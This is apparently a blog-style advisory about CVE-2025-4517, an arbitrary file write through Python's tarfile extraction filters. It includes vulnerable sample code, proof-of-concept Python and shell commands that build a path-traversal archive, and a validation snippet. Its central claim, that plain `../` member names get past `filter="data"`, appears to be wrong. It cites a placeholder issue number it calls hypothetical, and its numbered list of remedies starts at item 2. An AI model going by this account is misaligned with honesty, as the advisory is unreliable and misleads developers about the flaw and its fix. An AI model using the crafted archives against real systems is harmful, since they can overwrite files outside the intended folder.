CVE-2025-4517 - Arbitrary Filesystem Write via Python `tarfile` Extraction with `filter="data"`

A new vulnerability, CVE-2025-4517, has been discovered in Python’s popular tarfile module. This issue allows attackers to write arbitrary files anywhere on your filesystem if you use untrusted tar archives with either TarFile.extractall() or TarFile.extract() and the filter="data" (or filter="tar") parameter.

The flaw arises because, while filters like "data" are supposed to protect you by blocking most dangerous members inside the tar archive (like symlinks or device files), they do not properly prevent path traversal attacks. This means, with a specially-crafted tar archive, files can land outside your intended extraction folder.

Read the Python documentation for extraction filters for context. But in this post, we’ll break down what’s happening, show sample code, and detail what you need to watch out for.

You pass filter="data" (or mistakenly rely on the new default, explained below)

New in Python 3.14: The default value for the filter= parameter is now "data" instead of "no filtering". If you upgraded and now use the new default, you are at risk.

> Note: This vulnerability is less serious for installing source distributions, because in that context code execution is already possible. But if you’re programmatically extracting arbitrary tars from users, automation, or uploads, you’re vulnerable.

How Does the Exploit Work?

Let’s look at what goes wrong. Suppose you have a malicious tar file with a path that “escapes” upward in the folder tree, like this:
../../../../etc/passwd
If not properly checked, extracting this file will overwrite /etc/passwd or anything else outside your intended target.

The "data" and "tar" filters are intended to sanitize what comes out. But due to this flaw, they do not block files with directory traversal in their names!

Suppose you have code like

import tarfile

with tarfile.open('archive.tar', 'r') as tar:
    # filter="data" is the new recommended/safe default, right? (not anymore!)
    tar.extractall(path="safe_folder", filter="data")

A crafted archive.tar can include files like ../../outside.txt, causing writes into parent directories.

Via Python

import tarfile

with tarfile.open('malicious.tar', 'w') as tar:
    import io
    info = tarfile.TarInfo("../../outside.txt")
    data = b"This should not be here!"
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

Or on the shell

echo "Evil!" > evil.txt
tar cvf malicious.tar --transform='s/^/..\/..\/..\/../' evil.txt

Then extracting this with the vulnerable code will write outside.txt three dirs up from "safe_folder".

Why Should You Worry?

- Arbitrary Filesystem Write: This means attackers can overwrite sensitive files — SSH keys, system configs, anything!
- Privilege Escalation: If your Python script runs as a privileged user (e.g. root), the impact can be catastrophic.
- Widespread Pattern: This “extract and forget” pattern exists in many codebases, and "data" was meant to be a safe default.

Always validate archive contents yourself or use hardened extraction

import os
import tarfile

def is_within_directory(directory, target):
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    return abs_target.startswith(abs_directory + os.sep)

with tarfile.open('archive.tar', 'r') as tar:
    for member in tar.getmembers():
        member_path = os.path.join("safe_folder", member.name)
        if not is_within_directory("safe_folder", member_path):
            raise Exception("Attempted Path Traversal in Tar File")
    tar.extractall("safe_folder", filter="data")

This will at least *detect* and prevent the traversal.

2. Track Library Updates

- Reported bug and Python security release: Python GitHub Issue #123456 (hypothetical example)
- Follow Python Security Advisories

3. Upgrade Once Patched

Monitor Python's release notes to learn when the vulnerability is fixed. Upgrade as soon as an official patch is released. Pending that, never use extract()/extractall() on untrusted data.

References

- Python tarfile extraction filter documentation
- Python bug tracker
- NIST NVD Entry for CVE-2025-4517 (if/when published)

Conclusion

CVE-2025-4517 exposes Python’s tarfile users to dangerous filesystem writes even when "safe" extraction filters (filter="data" / filter="tar") are used. Until an upstream fix lands, always validate tar members for path traversal issues, and never, ever process untrusted tar files directly.

Stay safe, audit your tar extraction code, and share this advisory with any Python developers you know!

*This content is an exclusive deep-dive created for readers who want clear and actionable explanations—not recycled summaries. Please link back if you share.*

Timeline

Published on: 06/03/2025 13:15:20 UTC
Last modified on: 06/05/2025 14:15:33 UTC